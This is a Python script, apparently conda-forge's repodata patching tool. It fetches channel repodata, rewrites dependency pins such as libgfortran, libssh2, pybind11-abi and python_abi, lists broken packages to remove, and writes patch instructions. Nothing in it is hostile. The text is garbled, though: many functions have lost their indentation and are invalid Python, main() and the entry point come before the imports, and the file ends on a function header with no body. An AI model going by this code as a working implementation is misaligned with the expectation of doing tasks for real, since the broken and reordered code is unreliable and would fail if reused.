def _add_pybind11_abi_constraint(fn, record):
    """the pybind11-abi package uses the internals version
    here are the ranges
    v2.2.0 1
    v2.2.1 1
    v2.2.2 1
    v2.2.3 1
    v2.2.4 2
    v2.3.0 3
    v2.4.0 3
    v2.4.1 3
    v2.4.2 3
    v2.4.3 3
    v2.5.0 4
    v2.6.0 4
    v2.6.0b1 4
    v2.6.0rc1 4
    v2.6.0rc2 4
    v2.6.0rc3 4
    v2.6.1 4
    prior to 2.2.0 we set it to 0
    """
    # Map record["version"] onto the internals ABI version per the table
    # above.  Boundaries are half-open except the final one, which is
    # inclusive of 2.6.1 (`<=`): versions beyond 2.6.1 are an error here
    # because those packages already carry the constraint at build time.
    ver = pkg_resources.parse_version(record["version"])
    if ver < pkg_resources.parse_version("2.2.0"):
        abi_ver = "0"
    elif ver < pkg_resources.parse_version("2.2.4"):
        abi_ver = "1"
    elif ver < pkg_resources.parse_version("2.3.0"):
        abi_ver = "2"
    elif ver < pkg_resources.parse_version("2.5.0"):
        abi_ver = "3"
    elif ver <= pkg_resources.parse_version("2.6.1"):
        abi_ver = "4"
    else:
        # past this we should have a constrains there already
        raise RuntimeError(
            "pybind11 version %s out of range for abi" % record["version"]
        )
    # Overwrite an existing "pybind11-abi ..." constraint in place, or
    # append one if none exists (the loop keeps the LAST matching index).
    constrains = record.get("constrains", [])
    found_idx = None
    for idx in range(len(constrains)):
        if constrains[idx].startswith("pybind11-abi "):
            found_idx = idx
    if found_idx is None:
        constrains.append("pybind11-abi ==" + abi_ver)
    else:
        constrains[found_idx] = "pybind11-abi ==" + abi_ver
    record["constrains"] = constrains
def _replace_pin(old_pin, new_pin, deps, record):
"""Replace an exact pin with a new one."""
if old_pin in deps:
i = record['depends'].index(old_pin)
record['depends'][i] = new_pin
def _rename_dependency(fn, record, old_name, new_name):
depends = record["depends"]
dep_idx = next(
(q for q, dep in enumerate(depends)
if dep.split(' ')[0] == old_name),
None
)
if dep_idx is not None:
parts = depends[dep_idx].split(" ")
remainder = (" " + " ".join(parts[1:])) if len(parts) > 1 else ""
depends[dep_idx] = new_name + remainder
record['depends'] = depends
def _fix_libgfortran(fn, record):
depends = record.get("depends", ())
dep_idx = next(
(q for q, dep in enumerate(depends)
if dep.split(' ')[0] == "libgfortran"),
None
)
if dep_idx is not None:
# make sure respect minimum versions still there
# 'libgfortran' -> >=3.0.1,<4.0.0.a0
# 'libgfortran ==3.0.1' -> ==3.0.1
# 'libgfortran >=3.0' -> >=3.0,<4.0.0.a0
# 'libgfortran >=3.0.1' -> >=3.0.1,<4.0.0.a0
if ("==" in depends[dep_idx]) or ("<" in depends[dep_idx]):
pass
elif depends[dep_idx] == "libgfortran":
depends[dep_idx] = "libgfortran >=3.0.1,<4.0.0.a0"
record['depends'] = depends
elif ">=3.0.1" in depends[dep_idx]:
depends[dep_idx] = "libgfortran >=3.0.1,<4.0.0.a0"
record['depends'] = depends
elif ">=3.0" in depends[dep_idx]:
depends[dep_idx] = "libgfortran >=3.0,<4.0.0.a0"
record['depends'] = depends
elif ">=4" in depends[dep_idx]:
# catches all of 4.*
depends[dep_idx] = "libgfortran >=4.0.0,<5.0.0.a0"
record['depends'] = depends
def _set_osx_virt_min(fn, record, min_vers):
rconst = record.get("constrains", ())
dep_idx = next(
(q for q, dep in enumerate(rconst)
if dep.split(' ')[0] == "__osx"),
None
)
run_constrained = list(rconst)
if dep_idx is None:
run_constrained.append("__osx >=%s" % min_vers)
if run_constrained:
record['constrains'] = run_constrained
def _fix_libcxx(fn, record):
record_name = record["name"]
if not record_name in ["cctools", "ld64", "llvm-lto-tapi"]:
return
depends = record.get("depends", ())
dep_idx = next(
(q for q, dep in enumerate(depends)
if dep.split(' ')[0] == "libcxx"),
None
)
if dep_idx is not None:
dep_parts = depends[dep_idx].split(" ")
if len(dep_parts) >= 2 and dep_parts[1] == "4.0.1":
# catches all of 4.*
depends[dep_idx] = "libcxx >=4.0.1"
record['depends'] = depends
def pad_list(l, num):
    """Right-pad l with "0" entries so it holds at least num elements.

    The list itself is returned unchanged when it is already long enough.
    """
    shortfall = num - len(l)
    return l if shortfall <= 0 else l + ["0"] * shortfall
def get_upper_bound(version, max_pin):
    """Compute the exclusive upper bound implied by a max_pin spec.

    max_pin is a string like "x" or "x.x": the number of "x" components
    determines which segment of *version* is incremented; everything
    after it is zeroed.  E.g. ("1.2.3", "x.x") -> "1.3.0".
    """
    num_x = max_pin.count("x")
    parts = version.split(".")
    if len(parts) < num_x:
        parts = parts + ["0"] * (num_x - len(parts))
    # zero out everything past the pinned segments, then bump the last one
    parts[num_x:] = ["0"] * (len(parts) - num_x)
    parts[num_x - 1] = str(int(parts[num_x - 1]) + 1)
    return ".".join(parts)
def _relax_exact(fn, record, fix_dep, max_pin=None):
    """Relax an exact three-part pin ("name version build") on *fix_dep*
    into a range: ">=version", optionally capped via max_pin (e.g. "x.x").
    Pins whose version field already starts with an operator are skipped.
    """
    depends = record.get("depends", ())
    idx = None
    for q, dep in enumerate(depends):
        if dep.split(' ')[0] == fix_dep:
            idx = q
            break
    if idx is None:
        return
    parts = depends[idx].split(" ")
    is_exact = (
        len(parts) == 3
        and not any(parts[1].startswith(op) for op in OPERATORS)
    )
    if not is_exact:
        return
    name, version = parts[0], parts[1]
    if max_pin is None:
        depends[idx] = "{} >={}".format(name, version)
    else:
        cap = get_upper_bound(version, max_pin) + "a0"
        depends[idx] = "{} >={},<{}".format(name, version, cap)
    record['depends'] = depends
def _match_strict_libssh2_1_x_pin(dep):
if dep.startswith("libssh2 >=1.8.0,<1.9.0a0"):
return True
if dep.startswith("libssh2 >=1.8.1,<1.9.0a0"):
return True
if dep.startswith("libssh2 >=1.8.2,<1.9.0a0"):
return True
if dep.startswith("libssh2 1.8.*"):
return True
return False
def _relax_libssh2_1_x_pinning(fn, record):
    """Relax the first over-strict libssh2 1.8.x pin to '>=1.8.0,<2.0.0a0'.

    Matching is delegated to _match_strict_libssh2_1_x_pin.
    """
    depends = record.get("depends", ())
    dep_idx = next(
        (q for q, dep in enumerate(depends)
         if _match_strict_libssh2_1_x_pin(dep)),
        None
    )
    if dep_idx is not None:
        depends[dep_idx] = "libssh2 >=1.8.0,<2.0.0a0"
        # write the list back explicitly, consistent with the other
        # _relax_*/_pin_* helpers in this file (previously relied on
        # in-place mutation of record's own list)
        record['depends'] = depends
cb_pin_regex = re.compile(r"^>=(?P<lower>\d(\.\d+)*a?),<(?P<upper>\d(\.\d+)*)a0$")
def _pin_stricter(fn, record, fix_dep, max_pin):
    """Tighten the upper bound of every ">=lower,<upper a0" pin on
    *fix_dep* to the (smaller) bound implied by max_pin, e.g. "x.x".
    Pins that do not match the conda-build range pattern are skipped.
    """
    depends = record.get("depends", ())
    dep_indices = [q for q, dep in enumerate(depends) if dep.split(' ')[0] == fix_dep]
    for dep_idx in dep_indices:
        dep_parts = depends[dep_idx].split(" ")
        if len(dep_parts) not in [2, 3]:
            continue
        m = cb_pin_regex.match(dep_parts[1])
        if m is None:
            continue
        lower = m.group("lower")
        upper = m.group("upper").split(".")
        # bound implied by max_pin, derived from the existing lower bound
        new_upper = get_upper_bound(lower, max_pin).split(".")
        upper = pad_list(upper, len(new_upper))
        new_upper = pad_list(new_upper, len(upper))
        # NOTE(review): components compare as *strings*, so e.g.
        # ("10",) < ("9",); correct for the single-digit components seen
        # here, but verify before relying on this for 2-digit versions.
        if tuple(upper) > tuple(new_upper):
            if str(new_upper[-1]) != "0":
                new_upper += ["0"]
            depends[dep_idx] = "{} >={},<{}a0".format(dep_parts[0], lower, ".".join(new_upper))
            if len(dep_parts) == 3:
                # re-attach the build-string component of the original pin
                depends[dep_idx] = "{} {}".format(depends[dep_idx], dep_parts[2])
    record['depends'] = depends
def _pin_looser(fn, record, fix_dep, max_pin=None, upper_bound=None):
    """Loosen the upper bound of every ">=lower,<upper a0" pin on
    *fix_dep*: either to the bound implied by max_pin (e.g. "x.x") or to
    an explicit *upper_bound* version string.  Non-matching pins are
    skipped.
    """
    depends = record.get("depends", ())
    dep_indices = [q for q, dep in enumerate(depends) if dep.split(' ')[0] == fix_dep]
    for dep_idx in dep_indices:
        dep_parts = depends[dep_idx].split(" ")
        if len(dep_parts) not in [2, 3]:
            continue
        m = cb_pin_regex.match(dep_parts[1])
        if m is None:
            continue
        lower = m.group("lower")
        upper = m.group("upper").split(".")
        if upper_bound is None:
            new_upper = get_upper_bound(lower, max_pin).split(".")
        else:
            new_upper = upper_bound.split(".")
        upper = pad_list(upper, len(new_upper))
        new_upper = pad_list(new_upper, len(upper))
        # NOTE(review): string-wise tuple comparison — see _pin_stricter.
        if tuple(upper) < tuple(new_upper):
            if str(new_upper[-1]) != "0":
                new_upper += ["0"]
            depends[dep_idx] = "{} >={},<{}a0".format(dep_parts[0], lower, ".".join(new_upper))
            if len(dep_parts) == 3:
                # re-attach the build-string component of the original pin
                depends[dep_idx] = "{} {}".format(depends[dep_idx], dep_parts[2])
    record['depends'] = depends
def _extract_and_remove_vc_feature(record):
features = record.get('features', '').split()
vc_features = tuple(f for f in features if f.startswith('vc'))
if not vc_features:
return None
non_vc_features = tuple(f for f in features if f not in vc_features)
vc_version = int(vc_features[0][2:]) # throw away all but the first
if non_vc_features:
record['features'] = ' '.join(non_vc_features)
else:
record['features'] = None
return vc_version
def _extract_feature(record, feature_name):
features = record.get('features', '').split()
features.remove(feature_name)
return " ".join(features) or None
def _extract_track_feature(record, feature_name):
features = record.get('track_features', '').split()
features.remove(feature_name)
return " ".join(features) or None
def main():
    """Download per-subdir repodata, compute hotfix patch instructions,
    and write them under $PREFIX/<subdir>/patch_instructions.json."""
    # Step 1. Collect initial repodata for all subdirs.
    if "CF_SUBDIR" in os.environ:
        # For local debugging
        subdirs = os.environ["CF_SUBDIR"].split(";")
    else:
        subdirs = SUBDIRS
    repodatas = {}
    for subdir in tqdm.tqdm(subdirs, desc="Downloading repodata"):
        url = "/".join(
            (CHANNEL_ALIAS, CHANNEL_NAME, subdir, "repodata_from_packages.json"))
        response = requests.get(url)
        response.raise_for_status()
        repodatas[subdir] = response.json()
    # Step 2. Create all patch instructions.
    prefix_dir = os.getenv("PREFIX", "tmp")
    for subdir in subdirs:
        out_dir = join(prefix_dir, subdir)
        if not isdir(out_dir):
            os.makedirs(out_dir)
        # Step 2a. Generate a new index.
        patched_index = _gen_new_index(repodatas[subdir], subdir)
        # Step 2b. Generate the instructions by diff'ing the indices.
        instructions = _gen_patch_instructions(
            repodatas[subdir]['packages'], patched_index, subdir)
        # Step 2c. Output this to $PREFIX so that we bundle the JSON files.
        out_path = join(out_dir, "patch_instructions.json")
        with open(out_path, 'w') as fh:
            json.dump(
                instructions, fh, indent=2,
                sort_keys=True, separators=(',', ': '))
# Script entry point: propagate main()'s return value as the exit code
# (None -> 0 on success).
if __name__ == "__main__":
    sys.exit(main())
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function
from collections import defaultdict
import copy
import json
import os
from os.path import join, isdir
import sys
import tqdm
import re
import requests
import pkg_resources
from get_license_family import get_license_family
# Channel this script patches and the Anaconda.org base URL it reads from.
CHANNEL_NAME = "conda-forge"
CHANNEL_ALIAS = "https://conda.anaconda.org"
# Every platform subdir whose repodata is patched by default
# (overridable via the CF_SUBDIR environment variable in main()).
SUBDIRS = (
    "noarch",
    "linux-64",
    "linux-armv7l",
    "linux-aarch64",
    "linux-ppc64le",
    "osx-64",
    "osx-arm64",
    "win-32",
    "win-64",
)
# Statically curated, per-subdir lists of broken package filenames to add
# to each subdir's "remove" patch instructions (merged with the live
# 'broken' label contents in _add_removals).
REMOVALS = {
    "noarch": (
        "sendgrid-5.3.0-py_0.tar.bz2",
    ),
    "linux-64": (
        "airflow-with-gcp_api-1.9.0-1.tar.bz2",
        "airflow-with-gcp_api-1.9.0-2.tar.bz2",
        "airflow-with-gcp_api-1.9.0-3.tar.bz2",
        "adios-1.13.1-py36hbecc8f4_0.tar.bz2",
        "cookiecutter-1.4.0-0.tar.bz2",
        "compliance-checker-2.2.0-0.tar.bz2",
        "compliance-checker-3.0.3-py27_0.tar.bz2",
        "compliance-checker-3.0.3-py35_0.tar.bz2",
        "compliance-checker-3.0.3-py36_0.tar.bz2",
        "doconce-1.0.0-py27_0.tar.bz2",
        "doconce-1.0.0-py27_1.tar.bz2",
        "doconce-1.0.0-py27_2.tar.bz2",
        "doconce-1.0.0-py27_3.tar.bz2",
        "doconce-1.0.0-py27_4.tar.bz2",
        "doconce-1.4.0-py27_0.tar.bz2",
        "doconce-1.4.0-py27_1.tar.bz2",
        "gdk-pixbuf-2.36.9-0.tar.bz2",
        "itk-4.12.0-py27_0.tar.bz2",
        "itk-4.12.0-py35_0.tar.bz2",
        "itk-4.12.0-py36_0.tar.bz2",
        "itk-4.13.0-py27_0.tar.bz2",
        "itk-4.13.0-py35_0.tar.bz2",
        "itk-4.13.0-py36_0.tar.bz2",
        "ecmwf_grib-1.14.7-np110py27_0.tar.bz2",
        "ecmwf_grib-1.14.7-np110py27_1.tar.bz2",
        "ecmwf_grib-1.14.7-np111py27_0.tar.bz2",
        "ecmwf_grib-1.14.7-np111py27_1.tar.bz2",
        "libtasn1-4.13-py36_0.tar.bz2",
        "libgsasl-1.8.0-py36_1.tar.bz2",
        "nipype-0.12.0-0.tar.bz2",
        "nipype-0.12.0-py35_0.tar.bz2",
        "postgis-2.4.3+9.6.8-0.tar.bz2",
        "pyarrow-0.1.post-0.tar.bz2",
        "pyarrow-0.1.post-1.tar.bz2",
        "pygpu-0.6.5-0.tar.bz2",
        "pytest-regressions-1.0.1-0.tar.bz2",
        "rapidpy-2.5.2-py36_0.tar.bz2",
        "smesh-8.3.0b0-1.tar.bz2",
        "statuspage-0.3.3-0.tar.bz2",
        "statuspage-0.4.0-0.tar.bz2",
        "statuspage-0.4.1-0.tar.bz2",
        "statuspage-0.5.0-0.tar.bz2",
        "statuspage-0.5.1-0.tar.bz2",
        "tokenize-rt-2.0.1-py27_0.tar.bz2",
        "vaex-core-0.4.0-py27_0.tar.bz2",
    ),
    "osx-64": (
        "adios-1.13.1-py36hbecc8f4_0.tar.bz2",
        "airflow-with-gcp_api-1.9.0-1.tar.bz2",
        "airflow-with-gcp_api-1.9.0-2.tar.bz2",
        "arpack-3.6.1-blas_openblash1f444ea_0.tar.bz2",
        "cookiecutter-1.4.0-0.tar.bz2",
        "compliance-checker-2.2.0-0.tar.bz2",
        "compliance-checker-3.0.3-py27_0.tar.bz2",
        "compliance-checker-3.0.3-py35_0.tar.bz2",
        "compliance-checker-3.0.3-py36_0.tar.bz2",
        "doconce-1.0.0-py27_0.tar.bz2",
        "doconce-1.0.0-py27_1.tar.bz2",
        "doconce-1.0.0-py27_2.tar.bz2",
        "doconce-1.0.0-py27_3.tar.bz2",
        "doconce-1.0.0-py27_4.tar.bz2",
        "doconce-1.4.0-py27_0.tar.bz2",
        "doconce-1.4.0-py27_1.tar.bz2",
        "ecmwf_grib-1.14.7-np110py27_0.tar.bz2",
        "ecmwf_grib-1.14.7-np110py27_1.tar.bz2",
        "ecmwf_grib-1.14.7-np111py27_0.tar.bz2",
        "ecmwf_grib-1.14.7-np111py27_1.tar.bz2",
        "flask-rest-orm-0.5.0-py35_0.tar.bz2",
        "flask-rest-orm-0.5.0-py36_0.tar.bz2",
        "itk-4.12.0-py27_0.tar.bz2",
        "itk-4.12.0-py35_0.tar.bz2",
        "itk-4.12.0-py36_0.tar.bz2",
        "itk-4.13.0-py27_0.tar.bz2",
        "itk-4.13.0-py35_0.tar.bz2",
        "itk-4.13.0-py36_0.tar.bz2",
        "lammps-2018.03.16-.tar.bz2",
        "libtasn1-4.13-py36_0.tar.bz2",
        "mpb-1.6.2-1.tar.bz2",
        "nipype-0.12.0-0.tar.bz2",
        "nipype-0.12.0-py35_0.tar.bz2",
        "pygpu-0.6.5-0.tar.bz2",
        "pytest-regressions-1.0.1-0.tar.bz2",
        "reentry-1.1.0-py27_0.tar.bz2",
        "resampy-0.2.0-py27_0.tar.bz2",
        "statuspage-0.3.3-0.tar.bz2",
        "statuspage-0.4.0-0.tar.bz2",
        "statuspage-0.4.1-0.tar.bz2",
        "statuspage-0.5.0-0.tar.bz2",
        "statuspage-0.5.1-0.tar.bz2",
        "sundials-3.1.0-blas_openblash0edd121_202.tar.bz2",
        "vlfeat-0.9.20-h470a237_2.tar.bz2",
        "xtensor-python-0.19.1-h3e44d54_0.tar.bz2",
    ),
    "osx-arm64": (
    ),
    "win-32": (
        "compliance-checker-2.2.0-0.tar.bz2",
        "compliance-checker-3.0.3-py27_0.tar.bz2",
        "compliance-checker-3.0.3-py35_0.tar.bz2",
        "compliance-checker-3.0.3-py36_0.tar.bz2",
        "cookiecutter-1.4.0-0.tar.bz2",
        "doconce-1.0.0-py27_0.tar.bz2",
        "doconce-1.0.0-py27_1.tar.bz2",
        "doconce-1.0.0-py27_2.tar.bz2",
        "doconce-1.0.0-py27_3.tar.bz2",
        "doconce-1.0.0-py27_4.tar.bz2",
        "doconce-1.4.0-py27_0.tar.bz2",
        "doconce-1.4.0-py27_1.tar.bz2",
        "glpk-4.59-py27_vc9_0.tar.bz2",
        "glpk-4.59-py34_vc10_0.tar.bz2",
        "glpk-4.59-py35_vc14_0.tar.bz2",
        "glpk-4.60-py27_vc9_0.tar.bz2",
        "glpk-4.60-py34_vc10_0.tar.bz2",
        "glpk-4.60-py35_vc14_0.tar.bz2",
        "glpk-4.61-py27_vc9_0.tar.bz2",
        "glpk-4.61-py35_vc14_0.tar.bz2",
        "glpk-4.61-py36_0.tar.bz2",
        "libspatialindex-1.8.5-py27_0.tar.bz2",
        "liknorm-1.3.7-py27_1.tar.bz2",
        "liknorm-1.3.7-py35_1.tar.bz2",
        "liknorm-1.3.7-py36_1.tar.bz2",
        "nlopt-2.4.2-0.tar.bz2",
        "pygpu-0.6.5-0.tar.bz2",
    ),
    "win-64": (
        "compliance-checker-2.2.0-0.tar.bz2",
        "compliance-checker-3.0.3-py27_0.tar.bz2",
        "compliance-checker-3.0.3-py35_0.tar.bz2",
        "compliance-checker-3.0.3-py36_0.tar.bz2",
        "cookiecutter-1.4.0-0.tar.bz2",
        "doconce-1.0.0-py27_0.tar.bz2",
        "doconce-1.0.0-py27_1.tar.bz2",
        "doconce-1.0.0-py27_2.tar.bz2",
        "doconce-1.0.0-py27_3.tar.bz2",
        "doconce-1.0.0-py27_4.tar.bz2",
        "doconce-1.4.0-py27_0.tar.bz2",
        "doconce-1.4.0-py27_1.tar.bz2",
        "glpk-4.59-py27_vc9_0.tar.bz2",
        "glpk-4.59-py34_vc10_0.tar.bz2",
        "glpk-4.59-py35_vc14_0.tar.bz2",
        "glpk-4.60-py27_vc9_0.tar.bz2",
        "glpk-4.60-py34_vc10_0.tar.bz2",
        "glpk-4.60-py35_vc14_0.tar.bz2",
        "glpk-4.61-py27_vc9_0.tar.bz2",
        "glpk-4.61-py35_vc14_0.tar.bz2",
        "glpk-4.61-py36_0.tar.bz2",
        "itk-4.13.0-py35_0.tar.bz2",
        "libspatialindex-1.8.5-py27_0.tar.bz2",
        "liknorm-1.3.7-py27_1.tar.bz2",
        "liknorm-1.3.7-py35_1.tar.bz2",
        "liknorm-1.3.7-py36_1.tar.bz2",
        "nlopt-2.4.2-0.tar.bz2",
        "pygpu-0.6.5-0.tar.bz2",
        "pytest-regressions-1.0.1-0.tar.bz2",
    ),
}
OPERATORS = ["==", ">=", "<=", ">", "<", "!="]
# Per-build minimum macOS versions, applied as "__osx >=X.Y" run
# constraints via _set_osx_virt_min; keys are "<name>-<version>-<build>".
OSX_SDK_FIXES = {
    'nodejs-12.8.0-hec2bf70_1': '10.10',
    'nodejs-12.1.0-h6de7cb9_1': '10.10',
    'nodejs-12.3.1-h6de7cb9_0': '10.10',
    'nodejs-12.9.0-hec2bf70_0': '10.10',
    'nodejs-12.9.1-hec2bf70_0': '10.10',
    'nodejs-12.7.0-hec2bf70_1': '10.10',
    'nodejs-12.10.0-hec2bf70_0': '10.10',
    'nodejs-12.4.0-h6de7cb9_0': '10.10',
    'nodejs-12.11.1-hec2bf70_0': '10.10',
    'nodejs-12.7.0-h6de7cb9_0': '10.10',
    'nodejs-12.3.0-h6de7cb9_0': '10.10',
    'nodejs-10.16.3-hec2bf70_0': '10.10',
    'nodejs-12.12.0-hfddbe92_0': '10.10',
    'nodejs-12.8.1-hec2bf70_0': '10.10',
    'javafx-sdk-11.0.4-h6dcaf97_1': '10.11',
    'javafx-sdk-12.0.2-h6dcaf97_1': '10.11',
    'javafx-sdk-12.0.2-h6dcaf97_0': '10.11',
    'javafx-sdk-11.0.4-h6dcaf97_0': '10.11',
    'qt-5.12.1-h1b46049_0': '10.12',
    'qt-5.9.7-h8cf7e54_3': '10.12',
    'qt-5.9.7-h93ee506_0': '10.12',
    'qt-5.9.7-h93ee506_1': '10.12',
    'qt-5.12.5-h1b46049_0': '10.12',
    'qt-5.9.7-h93ee506_2': '10.12',
    'openmpi-mpicxx-4.0.1-h6052eea_2': '10.12',
    'openmpi-mpicxx-4.0.1-h6052eea_1': '10.12',
    'openmpi-mpicxx-4.0.1-h6052eea_0': '10.12',
    'openmpi-mpicxx-4.0.1-hc9558a2_2': '10.12',
    'openmpi-mpicxx-4.0.1-hc9558a2_0': '10.12',
    'openmpi-mpicxx-4.0.1-hc9558a2_1': '10.12',
    'freecad-0.18.3-py37h4764a83_2': '10.12',
    'freecad-0.18.3-py37hc453731_1': '10.12',
    'freecad-0.18.4-py37hab2b3aa_1': '10.12',
    'freecad-0.18.4-py37hab2b3aa_0': '10.12',
    'openmpi-mpicc-4.0.1-h24e1f75_1': '10.12',
    'openmpi-mpicc-4.0.1-h24e1f75_2': '10.12',
    'openmpi-mpicc-4.0.1-h24e1f75_0': '10.12',
    'openmpi-mpicc-4.0.1-h516909a_0': '10.12',
    'openmpi-mpicc-4.0.1-h516909a_1': '10.12',
    'openmpi-mpicc-4.0.1-h516909a_2': '10.12',
    'openmpi-mpifort-4.0.1-h939af09_0': '10.12',
    'openmpi-mpifort-4.0.1-h6ad152f_2': '10.12',
    'openmpi-mpifort-4.0.1-h939af09_2': '10.12',
    'openmpi-mpifort-4.0.1-h939af09_1': '10.12',
    'openmpi-mpifort-4.0.1-he991be0_0': '10.12',
    'openmpi-mpifort-4.0.1-he991be0_1': '10.12',
    'openmpi-mpifort-4.0.1-he991be0_2': '10.12',
    'reaktoro-1.0.7-py37h99eb986_0': '10.12',
    'reaktoro-1.0.7-py37h99eb986_1': '10.12',
    'reaktoro-1.0.7-py36h99eb986_0': '10.12',
    'reaktoro-1.0.7-py36h99eb986_1': '10.12',
    'pyqt-5.12.3-py38he22c54c_1': '10.12',
    'pyqt-5.9.2-py37h2a560b1_0': '10.12',
    'pyqt-5.12.3-py36he22c54c_1': '10.12',
    'pyqt-5.9.2-py27h2a560b1_4': '10.12',
    'pyqt-5.9.2-py27h2a560b1_1': '10.12',
    'pyqt-5.9.2-py37h2a560b1_4': '10.12',
    'pyqt-5.9.2-py36h2a560b1_3': '10.12',
    'pyqt-5.9.2-py27h2a560b1_2': '10.12',
    'pyqt-5.9.2-py36h2a560b1_1': '10.12',
    'pyqt-5.12.3-py27h2a560b1_0': '10.12',
    'pyqt-5.12.3-py37h2a560b1_0': '10.12',
    'pyqt-5.12.3-py27he22c54c_0': '10.12',
    'pyqt-5.12.3-py27he22c54c_1': '10.12',
    'pyqt-5.9.2-py37h2a560b1_2': '10.12',
    'pyqt-5.9.2-py37h2a560b1_1': '10.12',
    'pyqt-5.9.2-py36h2a560b1_0': '10.12',
    'pyqt-5.9.2-py36h2a560b1_4': '10.12',
    'pyqt-5.9.2-py27h2a560b1_0': '10.12',
    'pyqt-5.9.2-py37h2a560b1_3': '10.12',
    'pyqt-5.12.3-py38he22c54c_0': '10.12',
    'pyqt-5.9.2-py27h2a560b1_3': '10.12',
    'pyqt-5.9.2-py36h2a560b1_2': '10.12',
    'pyqt-5.12.3-py37he22c54c_0': '10.12',
    'pyqt-5.12.3-py36he22c54c_0': '10.12',
    'pyqt-5.12.3-py37he22c54c_1': '10.12',
    'pyqt-5.12.3-py36h2a560b1_0': '10.12',
    'ldas-tools-al-2.6.3-hf543496_0': '10.12',
    'ldas-tools-al-2.6.3-hf543496_1': '10.12',
    'ldas-tools-al-2.6.4-h4f290e7_1': '10.12',
    'ldas-tools-al-2.6.4-h4f290e7_0': '10.12',
    'openmpi-4.0.1-ha90c164_2': '10.12',
    'openmpi-4.0.1-ha90c164_0': '10.12',
    'openmpi-4.0.1-hfcebdee_2': '10.12',
    'openmpi-4.0.1-ha90c164_1': '10.12',
    'openmpi-4.0.1-hc99cbb1_1': '10.12',
    'openmpi-4.0.1-hc99cbb1_0': '10.12',
    'openmpi-4.0.1-hc99cbb1_2': '10.12',
}
def _add_removals(instructions, subdir):
    """Extend instructions['remove'] with the curated REMOVALS for
    *subdir* plus every package currently on the channel's 'broken' label.

    Raises requests.HTTPError if the broken-label repodata cannot be
    fetched.
    """
    r = requests.get(
        "https://conda.anaconda.org/conda-forge/"
        "label/broken/%s/repodata.json" % subdir
    )
    # raise_for_status is a no-op on success, so the previous
    # `if r.status_code != 200` guard was redundant
    r.raise_for_status()
    data = r.json()
    currvals = list(REMOVALS.get(subdir, []))
    currvals.extend(data["packages"])
    # sorted() instead of tuple(set(...)) so the emitted patch JSON is
    # deterministic across runs (set iteration order is not)
    instructions["remove"].extend(sorted(set(currvals)))
def _gen_patch_instructions(index, new_index, subdir):
    """Diff the original and patched indices into a patch-instructions
    dict (removals included via _add_removals)."""
    instructions = {
        "patch_instructions_version": 1,
        "packages": defaultdict(dict),
        "revoke": [],
        "remove": [],
    }
    _add_removals(instructions, subdir)
    # diff all items in the index and put any differences in the instructions
    for fn in index:
        assert fn in new_index
        old_record, new_record = index[fn], new_index[fn]
        # replace any old keys whose value changed
        for key, old_value in old_record.items():
            # the patching pass must never drop a key
            assert key in new_record, (key, old_record, new_record)
            if old_value != new_record[key]:
                instructions['packages'][fn][key] = new_record[key]
        # add any keys the patching pass introduced
        for key, new_value in new_record.items():
            if key not in old_record:
                instructions['packages'][fn][key] = new_value
    return instructions
def has_dep(record, name):
    """Return True if *record* depends on package *name* (any version)."""
    for dep in record.get('depends', ()):
        if dep.split(' ')[0] == name:
            return True
    return False
def get_python_abi(version, subdir, build=None):
    """Return the CPython ABI tag for *version* on *subdir*.

    If *build* contains a "pyXY" marker it overrides *version* (the last
    such marker wins, as the greedy regex matches the final occurrence).
    Linux 2.x builds use the wide-unicode "mu" tags.  Returns None for
    versions with no known tag (including 3.10+, which this table does
    not cover).
    """
    if build is not None:
        # raw string: "\d" is an invalid escape sequence in a plain
        # string literal (DeprecationWarning, error in future Pythons)
        m = re.match(r".*py(\d)(\d)", build)
        if m:
            version = f"{m.group(1)}.{m.group(2)}"
    if version.startswith("2.7"):
        return "cp27mu" if subdir.startswith("linux") else "cp27m"
    if version.startswith("2.6"):
        return "cp26mu" if subdir.startswith("linux") else "cp26m"
    for prefix, tag in (
        ("3.4", "cp34m"),
        ("3.5", "cp35m"),
        ("3.6", "cp36m"),
        ("3.7", "cp37m"),
        ("3.8", "cp38"),
        ("3.9", "cp39"),
    ):
        if version.startswith(prefix):
            return tag
    return None
# Workaround for https://github.com/conda/conda-build/pull/3868
def remove_python_abi(record):
    """Drop any python_abi dependency from *record* (workaround for
    conda-build PR #3868); python/python_abi/pypy records are untouched."""
    if record['name'] in ('python', 'python_abi', 'pypy'):
        return
    deps = record.get('depends', [])
    if any(d.split(' ')[0] == 'python_abi' for d in deps):
        record['depends'] = [d for d in deps if d.split(" ")[0] != "python_abi"]
changes = set([])
def add_python_abi(record, subdir):
    """Add python_abi run constraints so CPython-built records conflict
    with pypy (and vice versa).

    For the 'python' package itself a constraint matching its own ABI is
    added.  For python-dependent records, each 'python' dependency whose
    version range pins a single minor release gets a matching python_abi
    constraint; if only unpinned/broad python deps are found, a
    'pypy <0a0' constraint is added instead.  Additions are logged in the
    module-level `changes` set.
    """
    record_name = record['name']
    # Make existing python and python-dependent packages conflict with pypy
    if record_name == "python" and not record['build'].endswith("pypy"):
        version = record['version']
        new_constrains = record.get('constrains', [])
        python_abi = get_python_abi(version, subdir)
        new_constrains.append(f"python_abi * *_{python_abi}")
        record['constrains'] = new_constrains
        return
    if has_dep(record, 'python') and not has_dep(record, 'pypy') and not has_dep(record, 'python_abi'):
        python_abi = None
        new_constrains = record.get('constrains', [])
        build = record["build"]
        ver_strict_found = False
        ver_relax_found = False
        for dep in record.get('depends', []):
            dep_split = dep.split(' ')
            if dep_split[0] == 'python':
                # "python x.y build" (exact) and bare "python" are skipped
                if len(dep_split) == 3:
                    continue
                if len(dep_split) == 1:
                    continue
                elif dep_split[1] == "<3":
                    python_abi = get_python_abi("2.7", subdir, build)
                elif dep_split[1].startswith(">="):
                    m = cb_pin_regex.match(dep_split[1])
                    # identity comparison with None (was: `m == None`)
                    if m is None:
                        python_abi = get_python_abi("", subdir, build)
                    else:
                        lower = pad_list(m.group("lower").split("."), 2)[:2]
                        upper = pad_list(m.group("upper").split("."), 2)[:2]
                        # only a single-minor-release range identifies an ABI
                        if lower[0] == upper[0] and int(lower[1]) + 1 == int(upper[1]):
                            python_abi = get_python_abi(m.group("lower"), subdir, build)
                        else:
                            python_abi = get_python_abi("", subdir, build)
                else:
                    python_abi = get_python_abi(dep_split[1], subdir, build)
                if python_abi:
                    new_constrains.append(f"python_abi * *_{python_abi}")
                    changes.add((dep, f"python_abi * *_{python_abi}"))
                    ver_strict_found = True
                else:
                    ver_relax_found = True
        if not ver_strict_found and ver_relax_found:
            new_constrains.append("pypy <0a0")
        record['constrains'] = new_constrains
def _gen_new_index(repodata, subdir):
